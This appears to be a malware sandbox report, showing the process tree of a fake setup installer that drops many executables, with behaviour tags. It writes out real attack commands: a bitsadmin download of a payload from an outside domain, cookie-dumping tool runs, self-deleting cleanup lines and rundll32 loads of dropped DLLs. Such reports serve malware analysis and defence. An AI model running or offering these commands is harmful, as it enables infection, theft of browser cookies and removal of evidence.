cmd.exe PID 3672 wrote to memory of 2720 3672 setup_install.exe cmd.exe PID 3672 wrote to memory of 3368 3672 setup_install.exe cmd.exe PID 3672 wrote to memory of 3368 3672 setup_install.exe cmd.exe PID 3672 wrote to memory of 3368 3672 setup_install.exe cmd.exe PID 4068 wrote to memory of 1252 4068 cmd.exe arnatic_2.exe PID 4068 wrote to memory of 1252 4068 cmd.exe arnatic_2.exe PID 4068 wrote to memory of 1252 4068 cmd.exe arnatic_2.exe PID 3104 wrote to memory of 1128 3104 cmd.exe arnatic_3.exe PID 3104 wrote to memory of 1128 3104 cmd.exe arnatic_3.exe PID 3104 wrote to memory of 1128 3104 cmd.exe arnatic_3.exe PID 2720 wrote to memory of 3712 2720 cmd.exe arnatic_6.exe PID 2720 wrote to memory of 3712 2720 cmd.exe arnatic_6.exe PID 2720 wrote to memory of 3712 2720 cmd.exe arnatic_6.exe PID 1548 wrote to memory of 2164 1548 cmd.exe arnatic_1.exe PID 1548 wrote to memory of 2164 1548 cmd.exe arnatic_1.exe PID 1548 wrote to memory of 2164 1548 cmd.exe arnatic_1.exe PID 3092 wrote to memory of 1584 3092 cmd.exe arnatic_5.exe PID 3092 wrote to memory of 1584 3092 cmd.exe arnatic_5.exe PID 3004 wrote to memory of 3788 3004 cmd.exe arnatic_4.exe PID 3004 wrote to memory of 3788 3004 cmd.exe arnatic_4.exe PID 3004 wrote to memory of 3788 3004 cmd.exe arnatic_4.exe PID 3368 wrote to memory of 3804 3368 cmd.exe arnatic_7.exe PID 3368 wrote to memory of 3804 3368 cmd.exe arnatic_7.exe PID 3368 wrote to memory of 3804 3368 cmd.exe arnatic_7.exe PID 3804 wrote to memory of 208 3804 arnatic_7.exe arnatic_7.exe PID 3804 wrote to memory of 208 3804 arnatic_7.exe arnatic_7.exe PID 3804 wrote to memory of 208 3804 arnatic_7.exe arnatic_7.exe PID 3788 wrote to memory of 3144 3788 arnatic_4.exe 3081054.exe PID 3788 wrote to memory of 3144 3788 arnatic_4.exe 3081054.exe PID 3788 wrote to memory of 3144 3788 arnatic_4.exe 3081054.exe PID 1128 wrote to memory of 3172 1128 arnatic_3.exe rUNdlL32.eXe PID 1128 wrote to memory of 3172 1128 arnatic_3.exe rUNdlL32.eXe PID 1128 wrote to memory of 3172 1128 arnatic_3.exe rUNdlL32.eXe PID 3172 wrote to memory of 3900 3172 rUNdlL32.eXe svchost.exe PID 3804 wrote to memory of 208 3804 arnatic_7.exe arnatic_7.exe PID 3804 wrote to memory of 208 3804 arnatic_7.exe arnatic_7.exe PID 3804 wrote to memory of 208 3804 arnatic_7.exe arnatic_7.exe PID 3804 wrote to memory of 208 3804 arnatic_7.exe arnatic_7.exe PID 3804 wrote to memory of 208 3804 arnatic_7.exe arnatic_7.exe PID 3172 wrote to memory of 2672 3172 rUNdlL32.eXe svchost.exe PID 3900 wrote to memory of 3872 3900 svchost.exe svchost.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Roaming\rsrbfsfC:\Users\Admin\AppData\Roaming\rsrbfsf2⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Roaming\wirbfsfC:\Users\Admin\AppData\Roaming\wirbfsf2⤵
-
C:\Users\Admin\AppData\Roaming\wirbfsfC:\Users\Admin\AppData\Roaming\wirbfsf3⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Roaming\jdrbfsfC:\Users\Admin\AppData\Roaming\jdrbfsf2⤵
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Roaming\rsrbfsfC:\Users\Admin\AppData\Roaming\rsrbfsf2⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Roaming\wirbfsfC:\Users\Admin\AppData\Roaming\wirbfsf2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\wirbfsfC:\Users\Admin\AppData\Roaming\wirbfsf3⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Roaming\jdrbfsfC:\Users\Admin\AppData\Roaming\jdrbfsf2⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll",QRIvBFx2⤵
- Windows security modification
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Roaming\rsrbfsfC:\Users\Admin\AppData\Roaming\rsrbfsf2⤵
-
C:\Users\Admin\AppData\Roaming\wirbfsfC:\Users\Admin\AppData\Roaming\wirbfsf2⤵
-
C:\Users\Admin\AppData\Roaming\jdrbfsfC:\Users\Admin\AppData\Roaming\jdrbfsf2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\335C.exeC:\Users\Admin\AppData\Local\Temp\335C.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (20).exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (20).exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC2647624\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_1.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_1.exearnatic_1.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im arnatic_1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_1.exe" & del C:\ProgramData\*.dll & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im arnatic_1.exe /f7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_2.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_2.exearnatic_2.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_3.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_3.exearnatic_3.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rUNdlL32.eXe"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub6⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_4.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_4.exearnatic_4.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_5.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_5.exearnatic_5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1126656.exe"C:\Users\Admin\AppData\Roaming\1126656.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5925079.exe"C:\Users\Admin\AppData\Roaming\5925079.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\3081054.exe"C:\Users\Admin\AppData\Roaming\3081054.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\1100866.exe"C:\Users\Admin\AppData\Roaming\1100866.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_7.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_7.exearnatic_7.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_7.exeC:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_7.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_6.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_6.exearnatic_6.exe5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Documents\qeWffXXPdL7IgtmXJGM3uvPh.exe"C:\Users\Admin\Documents\qeWffXXPdL7IgtmXJGM3uvPh.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\qeWffXXPdL7IgtmXJGM3uvPh.exeC:\Users\Admin\Documents\qeWffXXPdL7IgtmXJGM3uvPh.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\xLrZ7sMbOcUYQ6ZyqN_bIeZe.exe"C:\Users\Admin\Documents\xLrZ7sMbOcUYQ6ZyqN_bIeZe.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\xLrZ7sMbOcUYQ6ZyqN_bIeZe.exeC:\Users\Admin\Documents\xLrZ7sMbOcUYQ6ZyqN_bIeZe.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\cjG0Iam1Jj0cNNTd_SEVIp5b.exe"C:\Users\Admin\Documents\cjG0Iam1Jj0cNNTd_SEVIp5b.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\n_XvoC0lA5U4xLfvwMUQ9ivc.exe"C:\Users\Admin\Documents\n_XvoC0lA5U4xLfvwMUQ9ivc.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\n_XvoC0lA5U4xLfvwMUQ9ivc.exeC:\Users\Admin\Documents\n_XvoC0lA5U4xLfvwMUQ9ivc.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\_eaNdnN9tnNRXIFKGG2yF0fp.exe"C:\Users\Admin\Documents\_eaNdnN9tnNRXIFKGG2yF0fp.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\_eaNdnN9tnNRXIFKGG2yF0fp.exe"C:\Users\Admin\Documents\_eaNdnN9tnNRXIFKGG2yF0fp.exe"7⤵
-
C:\Users\Admin\Documents\iaK6LGtP0xsu467Y5J6nvafj.exe"C:\Users\Admin\Documents\iaK6LGtP0xsu467Y5J6nvafj.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\1YsRDMFL5gbGtNm7s1bVicwX.exe"C:\Users\Admin\Documents\1YsRDMFL5gbGtNm7s1bVicwX.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\1YsRDMFL5gbGtNm7s1bVicwX.exeC:\Users\Admin\Documents\1YsRDMFL5gbGtNm7s1bVicwX.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\9zaJqMiAhVnJuMyvpBs_Vj8h.exe"C:\Users\Admin\Documents\9zaJqMiAhVnJuMyvpBs_Vj8h.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\DHL4Bb1YNR_LuTP87OTPpPEl.exe"C:\Users\Admin\Documents\DHL4Bb1YNR_LuTP87OTPpPEl.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\DHL4Bb1YNR_LuTP87OTPpPEl.exeC:\Users\Admin\Documents\DHL4Bb1YNR_LuTP87OTPpPEl.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\7ZI0ROMveurFDV8Aq7DVyS06.exe"C:\Users\Admin\Documents\7ZI0ROMveurFDV8Aq7DVyS06.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\aq3T5oYFV8GDNuh6ZK8xkEpC.exe"C:\Users\Admin\Documents\aq3T5oYFV8GDNuh6ZK8xkEpC.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z7⤵
- Download via BitsAdmin
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx7⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx8⤵
- Loads dropped DLL
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
- Drops file in Program Files directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"7⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT7⤵
- Loads dropped DLL
-
C:\Users\Admin\Documents\ARSOO0DIp2UugIvuwrSyM9oD.exe"C:\Users\Admin\Documents\ARSOO0DIp2UugIvuwrSyM9oD.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\mqnMtgWvbwILOMZrKc6CsUOn.exe"C:\Users\Admin\Documents\mqnMtgWvbwILOMZrKc6CsUOn.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 6607⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 6767⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 6527⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 6607⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 8887⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 11087⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Documents\zlH6t0Do4fta14d4vAtHE7CM.exe"C:\Users\Admin\Documents\zlH6t0Do4fta14d4vAtHE7CM.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\zlH6t0Do4fta14d4vAtHE7CM.exe"C:\Users\Admin\Documents\zlH6t0Do4fta14d4vAtHE7CM.exe" -a7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\xe3VggU3QswqnlgTx1tHoeRE.exe"C:\Users\Admin\Documents\xe3VggU3QswqnlgTx1tHoeRE.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im xe3VggU3QswqnlgTx1tHoeRE.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\xe3VggU3QswqnlgTx1tHoeRE.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im xe3VggU3QswqnlgTx1tHoeRE.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\k7J6IwuP2boLb7UjbN8PRSuh.exe"C:\Users\Admin\Documents\k7J6IwuP2boLb7UjbN8PRSuh.exe"6⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Program Files (x86)\Browzar\Browzar.exe"C:\Program Files (x86)\Browzar\Browzar.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3876 -s 27528⤵
- Program crash
-
C:\Users\Admin\Documents\DwWykW183aeAvVfpw5QqTYgL.exe"C:\Users\Admin\Documents\DwWykW183aeAvVfpw5QqTYgL.exe"6⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\file4.exe"C:\Program Files (x86)\Company\NewProduct\file4.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\rUNdlL32.eXe"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",shl8⤵
- Loads dropped DLL
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
-
